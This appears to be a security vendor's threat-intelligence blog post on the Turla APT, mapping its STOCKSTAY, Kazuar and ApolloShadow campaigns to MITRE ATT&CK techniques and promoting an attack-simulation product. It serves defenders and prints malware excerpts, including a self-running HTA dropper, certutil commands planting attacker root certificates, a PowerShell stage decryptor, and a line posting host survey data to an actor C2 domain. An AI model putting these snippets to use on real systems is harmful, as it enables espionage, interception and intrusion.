Turla (Secret Blizzard) APT: STOCKSTAY and Kazuar Backdoors Explained
| July 06, 2026
Key Takeaways
- Turla, linked to Russia's FSB, has conducted cyber-espionage operations against governments and military organizations since 2004.
- The group routinely hijacks other threat actors' infrastructure to deploy its own tools and expand operational reach.
- STOCKSTAY and Kazuar backdoors form the core of Turla's custom malware toolset for long-term intelligence collection.
- Turla conceals command-and-control traffic by routing it through legitimate services like Cloudflare Workers and GitHub.
- The Picus Platform lets security teams simulate Turla attacks and validate defenses against its observed techniques.
Turla (aka Secret Blizzard, Snake, and Uroburos) is a Russia-aligned advanced persistent threat (APT) group linked to the Federal Security Service (FSB), active since at least 2004. It is one of the longest-running cyber-espionage operations tracked publicly.
Focused on long-term intelligence collection, Turla primarily targets government and diplomatic entities, embassies, military and defense organizations, research institutions, and NGOs. Its victims span the United States, Europe, the former Eastern Bloc, and the Middle East, with recent operations concentrated heavily on Ukraine.
The group is known for custom toolsets such as the STOCKSTAY and Kazuar backdoors, for hijacking other actors' infrastructure, and for abusing legitimate cloud and web services to conceal its command-and-control traffic.
In this blog, we will examine Turla's major campaigns and break down its tactics, techniques, and procedures (TTPs). In the end, we will show how Picus Platform validates your security controls against this threat group.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
What Are the Major Activities of the Turla?
2004 – Began watering hole and spear-phishing campaigns targeting embassies and military organizations across the U.S., Europe, and Eastern Bloc nations.
2008 – Used Agent.BTZ to infect U.S. military networks in the Middle East and breach the U.S. Department of Defense.
2014 – Breached the Swiss defense company RUAG.
2017 – Introduced the Kazuar .NET backdoor and ComRAT v4 for stealthy data theft and exfiltration.
2018 – Compromised the French Armed Forces.
October 2019 – Hijacked Iranian group OilRig's C2 infrastructure to deploy its own tools against victims of interest.
Early 2020 – Deployed LunarWeb and LunarMail backdoors against a European MFA and its three Middle East diplomatic missions.
2020 – Deployed the TinyTurla backdoor against systems in the U.S., Germany, and Afghanistan.
July 2022 – Created a malicious Android app posing as a pro-Ukrainian DDoS tool targeting Russian sites.
December 2022 – Gained access to Pakistani group Storm-0156's C2 server to hijack its operations against Afghan and Indian targets.
January 12, 2024 – Exfiltrated data from a European NGO using the Chisel tool.
February 2025 – Executed Kazuar v3 in Ukraine using Gamaredon's PteroGraphin and PteroOdd tools.
November 2025 – Delivered STOCKSTAY to Ukraine via RAR archives exploiting the WinRAR flaw CVE-2025-8088.
Which MITRE ATT&CK Techniques Are Used by Turla?
Tactic: Resource Development
T1583.001 Acquire Infrastructure: Domains
Turla registers lookalike domains tailored to each victim community.
For STOCKSTAY, the group registered phishing domains embedding the strings "education" and "diplo", and stood up domains impersonating specific academic institutions to host the malicious RDP endpoints that victims connected out to.
Additionally, in the Kazuar operations, Turla and its partner, Gamaredon, registered names on a free dynamic-DNS provider, including eset.ydns[.]eu and ekrn.ydns[.]eu, deliberately chosen to impersonate a legitimate endpoint-security product.
T1583.006 Acquire Infrastructure: Web Services
Turla leans heavily on legitimate third-party platforms to host its WebSocket C2 and payloads, which frees the group from operating attributable infrastructure.
STOCKSTAY C2 endpoints were repeatedly hosted on serverless application platforms (wss://google-ai-labs-it.onrender.com/ws) and on a browser-based hosting service (wss://wool-basalt-clock.glitch.me/ws).
GitHub was also abused to stage installers and server-side controller code.
T1584.004 Compromise Infrastructure: Server
Turla routinely compromises legitimate servers to stage payloads and terminate C2.
In the STOCKSTAY operations, malware ZIP archives were served from a compromised State Regulatory Service of Ukraine site (www.drs.gov.ua/.../docs.zip), a compromised WordPress instance, and a compromised Ukrainian IT-company site (basecon.com.ua/calculator.rar).
Similarly, Turla persistently uses compromised WordPress servers as Kazuar C2, embedding index pages under plausible WordPress paths (for example .../wp-includes/style-engine/css/index.php).
T1585 Establish Accounts
Turla created disposable developer accounts to test and stage tooling.
A GitHub account (Roberto1983-ai) hosted DiplomacyEduAI.msi STOCKSTAY installers across two throwaway repositories, and a second account (ChikenFresh) hosted the Python STOCKSTAY C2 controller in a repository.
T1586.002 Compromise Accounts: Email Accounts
Turla compromises legitimate mailboxes to lend authenticity to its phishing.
STOCKSTAY delivery relied on a compromised Ukrainian university email account that distributed a malicious RDP file under the guise of a distance-learning trial.
T1587.001 Develop Capabilities: Malware
Turla develops its own malware in-house for cyberespionage.
Its primary custom tools are the STOCKSTAY multi-component .NET backdoor and the Kazuar toolkit, both used for host control, tasking, and long-term intelligence collection [1].
Tactic: Initial Access
T1189 Drive-by Compromise
In the ApolloShadow campaign, Turla's AiTM position at the ISP/Telco layer inside Russia forced target devices behind a captive portal. When the device's connectivity check reached out (hxxp://www.msftconnecttest[.]com/redirect), the traffic was silently redirected to an actor-controlled domain that presented a certificate-validation prompt and coerced the target into downloading and executing ApolloShadow [2].
T1566.001 Phishing: Spearphishing Attachment
STOCKSTAY has been delivered through several attachment types: malicious .rdp configuration files that establish an outbound connection to actor infrastructure through which follow-on payloads are pushed; a malicious HTA embedded in a calculator.rar archive impersonating a military pay calculator; and RAR archives that weaponize a WinRAR path-traversal vulnerability (CVE-2025-8088) to drop STOCKSTAY components into the startup folder [1].
Tactic: Execution
T1059.001 Command and Scripting Interpreter: PowerShell
Turla's Kazuar loaders are PowerShell. The loader that restarts Kazuar v3 uses a pair of Start-Process calls to launch legitimate-looking host binaries that side-load the implant into memory:
|
# Kazuar loader: start the legitimate host binaries that side-load Kazuar # Side-loads LaunchGFExperienceLOC.dll, the Kazuar loader Start-Process -FilePath "C:\Program Files (x86)\NVIDIA utils\Driver\GFExperience\LaunchGFExperience.exe"; |
T1059.005 Command and Scripting Interpreter: Visual Basic
ApolloShadow retrieves an encoded VBScript second stage, writes it to %TEMP% directory, and launches it via wscript:
|
wscript.exe %TEMP%\<payload-filename>.vbs |
Additionally, a VBScript variant of the Kazuar v2 installer (Sandboxie.vbs) was uploaded from Kyrgyzstan, indicating Turla's interest in targets beyond Ukraine [3].
T1059.007 Command and Scripting Interpreter: JavaScript
The military pay calculator HTA lure carries JScript that self-arms on load, unpacks a disguised payload, and executes it [1]:
|
function renameAndRunFile() { try { // payload shipped with a benign .dat extension var oldName = "calculator_2025_files\\styles.dat"; // renamed to .exe at runtime to defeat static extension checks var newName = "calculator_2025_files\\styles.dat.exe"; var fso = new ActiveXObject("Scripting.FileSystemObject"); if (fso.FileExists(oldName)) { ... fso.MoveFile(oldName, newName); // .dat -> .dat.exe var shell = new ActiveXObject("WScript.Shell"); // execute STOCKSTAY.MARKETMAKER downloader shell.Run('"' + newName + '"', 1, false); } } catch (e) { } } // auto-run on render window.onload = function() { renameAndRunFile(); }; |
T1106 Native API
ApolloShadow drives its execution through direct Windows API calls: GetTokenInformation to branch on elevation level, CreateProcessW to launch the VBScript stage, ShellExecuteA to re-launch itself for a UAC prompt, and NetUserAdd to create a local administrator.
T1203 Exploitation for Client Execution
The drone-lure RAR archives exploit CVE-2025-8088, a path-traversal flaw in WinRAR, so that extraction of a seemingly innocuous archive silently writes STOCKSTAY components (and startup LNK files) outside the intended directory [1] .
Tactic: Persistence
T1136.001 Create Account: Local Account
After elevating, ApolloShadow creates a hidden local administrator to guarantee re-entry [2]:
|
# Created via the NetUserAdd Windows API Username : UpdatusUser Password : <hardcoded> Group : Administrators # local admin membership |
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
STOCKSTAY establishes persistence through autorun entries and startup shortcuts:
|
# Autorun key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<value> = <path to STOCKSTAY component> # Per-component startup LNKs (extracted into the Startup folder via the CVE-2025-8088 path traversal) MSViewer.lnk -> STOCKSTAY.STOCKMARKET MSDriver.lnk -> STOCKSTAY.STOCKBROKER MSRender.lnk -> STOCKSTAY.STOCKTRADER |
Tactic: Privilege Escalation
When ApolloShadow's process token lacks full elevation, it re-launches itself with ShellExecuteA to trigger a UAC consent dialog, coercing the user into granting the highest privileges available.
An example usage of ShellExecuteA can be:
|
ShellExecuteA(NULL, "runas", selfPath, NULL, NULL, SW_SHOWNORMAL); |
Tactic: Stealth
T1027 Obfuscated Files or Information
STOCKSTAY hides its logic behind multiple layers. Its configuration files masquerade as legitimate crypto-market applications: real exchange URLs and falsified field descriptions wrap the encrypted operational data.
Separately, its core strings are obfuscated at runtime by the K1MORPHER class, which derives a keystream from the "Squirrel3" pseudo-random noise function. The CIL of the noise routine reconstructs to:
|
// K1MORPHER runtime deobfuscation keystream (reconstructed from the .NET CIL bytecode) uint32_t squirrel3(int position, uint32_t seed) { uint32_t m = (uint32_t)position; m *= BIT_NOISE1; m += seed; m ^= (m >> 8); m += BIT_NOISE2; m ^= (m << 8); m *= BIT_NOISE3; m ^= (m >> 8); return m; // used to decrypt strings, ints, longs, floats, doubles, and arrays on demand } |
The same K1MORPHER code was later observed inside Kazuar, tying the two families to one development ecosystem.
T1036.005 Masquerading: Match Legitimate Resource Name or Location
STOCKSTAY has masqueraded as stock-market, PDF-viewer, and calculator utilities; its downloader posed as MicrosoftUpdateOneDrive; and its MSIs shipped as DiplomacyEduAI.msi and Copia.msi (impersonating a legitimate .NET decompiler).
A later build also split functionality into modules named to imitate system libraries (ms-lib-math-core.dll, ms-api-wmcpdt.dll, ms-api-win-render.dll).
The Kazuar loaders sit in legitimate-looking directories, for example C:\Program Files (x86)\Brother Printer\App\ and %LOCALAPPDATA%\Programs\Sony\Audio\Drivers\.
T1140 Deobfuscate/Decode Files or Information
Payloads are consistently multi-encoded and decoded only at execution.
The Kazuar delivery chain nests base64 inside 3DES, decrypting with a hardcoded key/IV before piping to PowerShell [3]:
|
# Excerpt of the delivery decryptor (3DES-CBC, hardcoded key and IV) $tripleDES = [System.Security.Cryptography.TripleDES]::Create(); $tripleDES.Key = [Convert]::FromBase64String("<base64-encoded-key>"); $tripleDES.IV = [Convert]::FromBase64String("<base64-encoded-IV>"); $decryptor = $tripleDES.CreateDecryptor(); $plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length); $decryptedText = [System.Text.Encoding]::UTF8.GetString($plainBytes); $decryptedText | powershell -noprofile -; # execute the decoded next stage |
T1480.001 Execution Guardrails: Environmental Keying
Turla gates decryption on the target environment so that a captured sample cannot be analyzed outside the intended host.
STOCKSTAY encrypts its configuration under a hash of the target's hostname or domain name, and its DIAMONDBACK dropper hashes hostname (and later username and domain) to unlock the payload [1].
Kazuar loaders decrypt their payloads using the machine name as the key.
T1553.004 Subvert Trust Controls: Install Root Certificate
The signature technique of the ApolloShadow campaign is planting attacker root certificates so the AiTM proxy can transparently strip TLS and impersonate any site [2] :
|
:: Install two attacker roots into the machine trust stores via the built-in certutil utility certutil.exe -f -Enterprise -addstore root "C:\Users\<username>\AppData\Local\Temp\crt3C5C.tmp" certutil.exe -f -Enterprise -addstore ca "C:\Users\<username>\AppData\Local\Temp\crt53FF.tmp" |
Because Firefox maintains its own trust store, the malware additionally writes a preference file so Firefox honors the OS roots:
|
// wincert.js dropped into the Firefox preferences directory // force Firefox to trust the OS root store (incl. attacker roots) pref("security.enterprise_roots.enabled", true); |
T1574.001 Hijack Execution Flow: DLL
Kazuar runs through DLL side-loading: the attacker drops a legitimate executable next to a malicious DLL of the name that executable expects, so it loads the attacker's DLL instead of the real one.
Here, the legitimate LaunchGFExperience.exe loads the malicious LaunchGFExperienceLOC.dll, which is the Kazuar loader and maps the KERNEL-role payload into memory.
The legitimate vncutil64.exe is abused the same way to load a second Kazuar payload.
Tactic: Credential Access
T1557 Adversary-in-the-Middle
From its AiTM position at the ISP/Telco layer, and with the attacker root certificates installed, Turla performs TLS/SSL stripping. As a result, most of the victim's browsing, including certain tokens and credentials, traverses in clear text and is captured by the proxy.
Tactic: Discovery
T1012 Query Registry
The Kazuar loader/survey scripts (the PowerShell reconnaissance stage that profiles the host and posts the results to the C2) read the registry to fingerprint the runtime, including the installed PowerShell version and the enumerated .NET framework versions [3]:
|
# Enumerate installed .NET versions from the NDP hive $n = (Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}' } | Select PSChildName, Version, Release | Out-String); |
STOCKSTAY's backdoor also exposes a "RegRead" command for arbitrary registry queries.
T1016 System Network Configuration Discovery
ApolloShadow enumerates host IP configuration via GetIpAddrTable, base64-encoding each entry.
T1057 Process Discovery
The Kazuar survey scripts enumerate and deduplicate running processes:
|
# Deduplicated list of running process names for the C2 survey $p = (Get-Process | Group-Object -Property Name | ForEach-Object { $_.Group[0] } | Select -Property Name | Out-String); |
An HTTP POST of the running-process list is also used to confirm a successful Kazuar launch.
T1082 System Information Discovery
STOCKSTAY's "Sysinfo" performs a broad WMI-based survey, capturing key host details such as OSVersion, Architecture, MachineName, SerialNumber, and BootupTime, among other fields [1].
The Kazuar survey collects last boot time, OS version, and OS bitness [3]:
|
$u = (Get-CimInstance -ClassName Win32_OperatingSystem | Select LastBootUpTime | Out-String); $o = [environment]::OSVersion.Version; $a = [System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture; |
T1083 File and Directory Discovery
STOCKSTAY's backdoor supports "Dir" (optionally recursive directory listing).
The Kazuar survey enumerates %TEMP% recursively along with %APPDATA%\Microsoft\Windows, C:\Program Files, and C:\Program Files (x86) [3] :
|
$t = Get-ChildItem -Recurse -Path $env:temp | Out-String; $path = $env:APPDATA + '\Microsoft\Windows'; $k7 = Get-ChildItem $path | Out-String; $p1 = Get-ChildItem -Path C:\Progra~1 | Out-String; # Program Files $p2 = Get-ChildItem -Path C:\Progra~2 | Out-String; # Program Files (x86) |
Tactic: Lateral Movement
During a Ukrainian incident, Turla propagated its toolset from a compromised domain controller. It deployed malware across multiple hosts via malicious Group Policy installation, aided by a supporting PowerShell backdoor run from the DC.
A Group Policy startup script is given below:
|
# Group Policy startup script entry pushing a staged tool to all domain machines \\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Scripts\Startup\deploy.cmd -> copy \\<dc>\staging\payload.exe %ProgramData%\svc.exe && %ProgramData%\svc.exe |
Tactic: Command and Control
T1071.001 Application Layer Protocol: Web Protocols
STOCKSTAY tunnels all C2 over secure WebSockets (wss://.../ws) through its dedicated STOCKBROKER component.
Kazuar communicates over HTTPS, with v3 adding WebSocket and Exchange Web Services transports.
ApolloShadow beacons over HTTP to its redirected C2.
T1102 Web Service
Turla routes C2 and payload delivery through legitimate web services to hide among benign traffic: serverless hosting and browser-app platforms for STOCKSTAY WebSocket endpoints, and Telegra.ph, gofile[.]io, and Cloudflare Workers as encrypted relays in the Kazuar chains.
T1104 Multi-Stage Channels
The STOCKSTAY C2 is deliberately multi-hop, so the victim never talks to the real C2 directly. A lightweight relay on a third-party platform acts as a dead-drop mailbox: clients drop off encrypted messages tagged with a recipient ID (send) and pick up messages addressed to them (recv). The operator works the same mailbox from the other side [1].
On disk, the mailbox is a SQLite table (weather_data1.db) whose columns use weather-themed names (for example, target stored as degrees, message as wdata) to look innocuous.
A simplified code for WebSocket relay is given below:
|
# Simplified victim-facing relay: WebSocket "mailbox" def on_message(self, message): pkg = json.loads(base64.b64decode(message)) # decode the request action = pkg["action"] # "send" = drop off, "recv" = pick up box = pkg["container"] if action == "send": # store an encrypted blob addressed TO box["target"], FROM box["sender"] mailbox.put(to=box["target"], sender=box["sender"], data=box["message"]) elif action == "recv": # return every message addressed to the caller, then delete it from the mailbox self.write_message(mailbox.take(to=box["sender"])) |
Tactic: Exfiltration
T1041 Exfiltration Over C2 Channel
Turla exfiltrates over the same channel used for tasking.
STOCKSTAY returns command output (files, screenshots, surveys) base64-encoded over its WebSocket C2.
The Kazuar loader posts its host survey to the C2 with a single Invoke-RestMethod call:
|
# Turla-assessed C2 masquerading as a security vendor $url = "https://eset.ydns[.]eu/post.php";
# computer/user + last boot + process list $tm = -join($c, "`n", $u, "`n", $p); ... $response = Invoke-RestMethod -Uri $url -Method Post -Body $tm -Headers $headers -ContentType "text/plain"; |
How Picus Simulates Turla Attacks?
We strongly suggest simulating Turla Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Turla:
|
Threat ID |
Threat Name |
Attack Module |
|
37971 |
STOCKSTAY Backdoor Malware Download Threat |
Network Infiltration |
|
20506 |
STOCKSTAY Backdoor Malware Email Threat |
E-mail Infiltration |
|
94902 |
Turla Threat Group Campaign Malware Download Threat |
Network Infiltration |
|
62855 |
Turla Threat Group Campaign Malware Email Threat |
E-mail Infiltration |
|
42709 |
Snake Malware Campaign |
macOS Endpoint |
|
78185 |
Amadey Botnet Download Threat |
Network Infiltration |
|
78355 |
Amadey Botnet Email Threat |
E-mail Infiltration |
|
49927 |
Amadey Malware Dropper Download Threat |
Network Infiltration |
|
94691 |
Amadey Malware Dropper Email Threat |
E-mail Infiltration |
|
82801 |
Turla Threat Group Campaign |
Linux Endpoint |
|
74167 |
Turla Threat Group Campaign |
Windows Endpoint |
|
43775 |
TinyTurla-NG Backdoor Malware Download Threat |
Network Infiltration |
|
35067 |
TinyTurla-NG Backdoor Malware Email Threat |
E-mail Infiltration |
|
91753 |
Turla Threat Group Campaign Backdoor Malware Download Threat |
Network Infiltration |
|
61929 |
Turla Threat Group Campaign Backdoor Malware Email Threat |
E-mail Infiltration |
|
59328 |
Turla Threat Group Campaign Malware Downloader Download Threat |
Network Infiltration |
|
72617 |
Turla Threat Group Campaign Malware Downloader Email Threat |
E-mail Infiltration |
|
82444 |
Gamarue Worm Email Threat |
E-mail Infiltration |
|
68211 |
Gamarue Worm Download Threat |
Network Infiltration |
|
51519 |
Neuron Trojan Email Threat |
E-mail Infiltration |
|
98899 |
Project Cobra Trojan Email Threat |
E-mail Infiltration |
|
31922 |
Project Cobra Trojan Download Threat |
Network Infiltration |
|
32961 |
Neuron Trojan Download Threat |
Network Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Platform.
What Are the Aliases of the Turla Group?
Turla is also known as: Secret Blizzard, ATG26, ATK13, Blue Python, G0010, Group 88, Hippo Team, IRON HUNTER, ITG12, KRYPTON, MAKERSMARK, Pacifier APT, Pfinet, Popeye, SIG23, SUMMIT, Snake, TAG_0530, UAC-0003, UAC-0024, UAC-0144, UNC4210, Uroburos, VENOMOUS Bear, WRAITH, Waterbug.
References
[1] “The Latest Addition to Turla’s Intelligence Gathering Apparatus,” Google Cloud Blog. Accessed: Jul. 03, 2026. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering
[2] M. T. Intelligence, “Frozen in transit: Secret Blizzard’s AiTM campaign against diplomats,” Microsoft Security Blog. Accessed: Jul. 03, 2026. [Online]. Available: https://www.microsoft.com/en-us/security/blog/2025/07/31/frozen-in-transit-secret-blizzards-aitm-campaign-against-diplomats/
[3] M. F. Rusnák, “Gamaredon X Turla collab.” Accessed: Jul. 03, 2026. [Online]. Available: https://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/
